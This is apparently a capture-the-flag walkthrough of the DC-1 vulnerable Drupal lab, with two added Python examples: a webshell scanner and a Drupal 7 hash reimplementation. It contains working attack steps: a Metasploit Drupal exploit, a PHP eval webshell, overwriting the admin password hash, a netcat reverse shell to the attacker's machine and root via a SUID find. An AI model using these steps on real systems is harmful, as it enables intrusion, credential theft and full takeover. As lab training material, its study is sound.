External information gathering
Target description
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.
So there are five flags to collect.
Target VM console
NIC information
| NIC mode | NAT (VMware VMnet8) |
| NIC MAC address | 00:0C:29:CA:5D:2A |
Active information gathering
Host discovery
sudo arp-scan -I eth0 192.168.16.0/24
Port scan
sudo nmap -A -sT -p- -sC -T4 192.168.16.138
(-A already enables the default scripts, so -sC is redundant here; -p- scans all 65535 TCP ports, which is why this scan takes a while.)
Two open ports: 22 (SSH) and 80 (HTTP).
Web information
The site turns out to be built on the Drupal CMS.
Open http://192.168.16.138/robots.txt
It lists a file that, when opened, suggests the Drupal version is probably 7.
Exploitation
Finding an exploit
Start msfconsole on Kali and search for Drupal modules:
search Drupal
We pick the second result: use 1
(The index depends on the installed Metasploit version, so check the module name in the search output before running use.)
Set the target IP: set rhosts 192.168.16.138
Launch it: run
A Meterpreter session is established.
Finding the flags
ls in the current directory (the Drupal web root) shows flag1
flag1
View it:
cat flag1
The clue points to a configuration file.
A Baidu search shows that Drupal keeps its configuration file in sites/default/ under the install directory.
cd into that directory:
cd sites/default
ls
flag2
There is a settings.php file.
cat settings.php
It contains flag2 together with the database credentials:
username: dbuser
password: R0ck3t
The next flag probably involves the database.
On the Kali desktop create a PHP file containing a one-line webshell (whatever arrives in the request parameter 777 is passed to eval):
<?php @eval($_REQUEST[777])?>
Upload it to the target through the Meterpreter session (upload writes to the session's current directory, which here is the Drupal web root):
upload /home/kali/Desktop/yjh.php
Browse to http://192.168.16.138/yjh.php to confirm the file is being served.
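As an added example, not from the writeup or from any tool it uses (Drupal, Metasploit, AntSword), here is the defender's view of the shell just planted: a Python scanner that flags PHP files in which a code or command execution sink is fed by a superglobal, either directly or through one variable assignment. The file names and contents are constructed samples and the function names are this example's own. It is regex based rather than a PHP parser, so it targets the one-liner style shown above, not heavily obfuscated shells.

```python
"""Added example (not from the writeup, Drupal or AntSword): a small static
scanner for PHP one-liner webshells like the <?php @eval($_REQUEST[777])?>
dropped above. It flags code/command execution sinks whose argument comes,
directly or through one variable assignment, from a PHP superglobal. The
sample files below are constructed for this demo; the function names are
this example's own."""
import re
from typing import Dict, List, Tuple

# Functions that execute PHP code or shell commands. assert() and
# create_function() are classic eval() substitutes in webshells.
SINKS = ("eval", "assert", "system", "passthru", "shell_exec", "exec",
         "popen", "proc_open", "create_function")
SUPERGLOBALS = r"\$_(?:REQUEST|GET|POST|COOKIE|FILES|SERVER)\b"
SUPERGLOBAL_RE = re.compile(SUPERGLOBALS)
# "$var = <expression containing a superglobal>;"  ->  $var is tainted.
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*[^;]*?" + SUPERGLOBALS + r"[^;]*;")
# A sink call with its raw argument text; tolerates one level of nested
# parentheses (enough for eval(base64_decode($_POST['x']))), not a full parser.
CALL_RE = re.compile(r"(@?)\b(" + "|".join(SINKS) + r")\s*\(([^()]*(?:\([^()]*\))?[^()]*)\)",
                     re.IGNORECASE)


def scan_php(source: str) -> List[Tuple[str, str]]:
    """Return (sink, reason) pairs for every sink call reached by user input."""
    findings = []
    tainted = {m.group(1) for m in ASSIGN_RE.finditer(source)}
    for m in CALL_RE.finditer(source):
        silenced, sink, arg = m.group(1), m.group(2).lower(), m.group(3)
        if SUPERGLOBAL_RE.search(arg):
            reason = "superglobal passed straight into sink"
        elif any(var in arg for var in tainted):   # substring match: $f also hits $foo
            reason = "variable assigned from superglobal reaches sink"
        else:
            continue
        if silenced:
            reason += " (error suppressed with @)"
        findings.append((sink, reason))
    return findings


def scan_files(files: Dict[str, str]) -> Dict[str, List[Tuple[str, str]]]:
    """Scan a {filename: source} mapping; keep only files with findings."""
    report = {}
    for name, src in files.items():
        hits = scan_php(src)
        if hits:
            report[name] = hits
    return report


# Constructed sample web root: the writeup's shell, two disguised shells, two benign files.
SAMPLES: Dict[str, str] = {
    "yjh.php": "<?php @eval($_REQUEST[777])?>",
    "img.php": "<?php eval(base64_decode($_POST['x'])); ?>",
    "run.php": "<?php $f = $_GET['f']; system($f); ?>",
    "search.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
    "cron.php": "<?php system('php cron.php'); ?>",
}

if __name__ == "__main__":
    for name, hits in scan_files(SAMPLES).items():
        for sink, reason in hits:
            print(f"{name}: {sink}() - {reason}")
```

Running it reports yjh.php, img.php and run.php and stays quiet on the two benign files; cron.php shows why the check is "sink plus user-controlled input" rather than "sink present", since a hard-coded system() call is normal application code.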
Then open AntSword (中国蚁剑, a webshell management tool) on a machine that can reach the target.
Right-click the empty area and choose Add connection.
URL: http://192.168.16.138/yjh.php
Password: 777
Right-click the new connection and choose Database operations (it needs the dbuser/R0ck3t credentials from settings.php).
In the drupaldb database open the users table; it contains the admin account.
The password is stored as a salted hash, not in clear text.
Rather than cracking it, open the virtual terminal and run Drupal's own hashing script to produce a hash for the new password 123456:
./scripts/password-hash.sh 123456
$S$DM5BbYAf4O15952GGyjt88i0FA3/KCA3wH3/YLgTcxzz9uXl6Nj4
In AntSword overwrite the admin hash with that value, so the admin password becomes 123456 (note the original hash first if you want to restore it afterwards):
update users set pass="$S$DM5BbYAf4O15952GGyjt88i0FA3/KCA3wH3/YLgTcxzz9uXl6Nj4" where uid=1
Log in on the web front end as admin with the new password.
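What the script just did, as an added example written for this page (not Drupal's code and not part of the writeup): a Python reimplementation of Drupal 7's password hashing from includes/password.inc, enough to generate the same kind of $S$ hash offline and to check one. It shows why the string starts with $S$D: $S$ selects SHA-512, the fourth character is the round count as an itoa64 index (D = 15, so 2**15 rounds), the next 8 characters are the salt, and the rest is a custom base64 of the digest, truncated to 55 characters. The writeup's hash is embedded as a constant so it can be checked against 123456; the function names mirror Drupal's without the leading underscore.

```python
"""Added example (not from the writeup or from Drupal's own codebase): a Python
reimplementation of Drupal 7's password hashing from includes/password.inc, so
the $S$... value that scripts/password-hash.sh printed can be produced and
checked offline. Format: "$S$" + one itoa64 char (log2 of the SHA-512 round
count) + 8-char salt + custom base64 of the digest, truncated to 55 chars."""
import hashlib
import os
from typing import Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55     # stored hashes are cut to this length
DRUPAL_HASH_COUNT = 15      # default log2 round count; ITOA64[15] == "D"
DRUPAL_MIN_HASH_COUNT = 7
DRUPAL_MAX_HASH_COUNT = 30

# Hash copied from the writeup (password 123456, salt M5BbYAf4, 2**15 rounds).
WRITEUP_HASH = "$S$DM5BbYAf4O15952GGyjt88i0FA3/KCA3wH3/YLgTcxzz9uXl6Nj4"


def password_base64_encode(data: bytes) -> str:
    """phpass-style base64: itoa64 alphabet, 3 bytes -> 4 chars, low bits first, no padding."""
    out = []
    i, count = 0, len(data)
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def password_crypt(password: str, setting: str) -> Optional[str]:
    """Drupal 7 _password_crypt() for the $S$ (SHA-512) scheme.

    `setting` is the first 12 chars of a stored hash: "$S$", round char, 8-char salt.
    Returns None on a malformed setting, where the PHP original returns FALSE."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12].encode()
    pw = password.encode()
    # One round over salt.password, then 2**count_log2 rounds over digest.password.
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + password_base64_encode(digest))[:DRUPAL_HASH_LENGTH]


def rounds(stored_hash: str) -> int:
    """SHA-512 round count encoded in the 4th character ("D" -> 2**15 = 32768)."""
    return 1 << ITOA64.find(stored_hash[3])


def user_hash_password(password: str, count_log2: int = DRUPAL_HASH_COUNT,
                       salt_bytes: Optional[bytes] = None) -> str:
    """Drupal 7 user_hash_password(): 6 random bytes -> 8-char salt, then crypt."""
    if salt_bytes is None:
        salt_bytes = os.urandom(6)
    setting = "$S$" + ITOA64[count_log2] + password_base64_encode(salt_bytes)
    return password_crypt(password, setting)


def user_check_password(password: str, stored_hash: str) -> bool:
    """Drupal 7 user_check_password() for $S$ hashes (legacy MD5 upgrade path omitted)."""
    if not stored_hash.startswith("$S$"):
        return False
    return password_crypt(password, stored_hash) == stored_hash


if __name__ == "__main__":
    fresh = user_hash_password("123456")
    print(fresh, user_check_password("123456", fresh))
    print("rounds in writeup hash:", rounds(WRITEUP_HASH))
    print("writeup hash verifies for 123456:", user_check_password("123456", WRITEUP_HASH))
```

Because the salt is random, every run of user_hash_password (like every run of password-hash.sh) prints a different string for 123456, yet each one verifies; that is also why a hash pulled from the users table cannot simply be compared against a precomputed list and has to be cracked salt by salt.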
flag3
Reverse shell
On Kali start a listener:
nc -lnvp 1234
On the target (AntSword: right-click, Virtual terminal) connect back; the IP here is Kali's:
nc -e /bin/bash 192.168.16.128 1234
(-e needs a netcat build that supports it, such as netcat-traditional; the OpenBSD variant does not have it, so -e working here also tells you which build the target ships.)
Kali now receives the reverse shell.
Upgrade it to a proper pseudo-terminal:
python -c 'import pty;pty.spawn("/bin/bash")'
Look for SUID binaries on the target:
find / -perm -4000 2>/dev/null
find itself is in the list, so anything it runs through -exec runs as root. Create a path for it to match:
mkdir /tmp/hello
find /tmp/hello -exec "/bin/sh" \;
We can now run commands as root (confirm with id). This works because /bin/sh on the target keeps the elevated effective uid; bash would drop it unless started with -p.
Go to flag4's home directory:
cd /home/flag4
ls
cat flag4.txt
flag4
flag5
Go to root's home directory:
cd /root
ls
cat thefinalflag.txt
Done!